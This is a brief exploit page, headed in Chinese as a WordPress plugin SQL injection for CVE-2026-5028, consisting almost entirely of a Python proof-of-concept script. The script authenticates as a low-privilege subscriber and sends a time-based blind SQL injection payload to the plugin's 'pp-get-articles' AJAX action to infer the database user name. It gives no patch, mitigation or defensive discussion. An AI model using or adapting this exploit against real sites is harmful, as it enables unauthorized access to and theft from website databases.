CVE-2026-5028 WordPress插件SQL注入漏洞

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker credentials (Subscriber level) login_url = "http://example.com/wp-login.php" username = "attacker" password = "password" session = requests.Session() # 1. Authenticate login_data = { "log": username, "pwd": password, "redirect_to": target_url, "testcookie": "1" } session.post(login_url, data=login_data) # 2. Exploit Payload (Time-based Blind SQL Injection) # Checking if the first character of the database user is 'a' (ASCII 97) payload = "1' AND IF(SUBSTRING(user(),1,1)='a',SLEEP(5),0)-- -" data = { "action": "pp-get-articles", "title": payload } # Send request and measure time try: response = session.post(target_url, data=data, timeout=10) # If response takes > 5 seconds, condition is true print("Check response time to confirm vulnerability.") except requests.exceptions.Timeout: print("Potential vulnerability confirmed (Timeout).")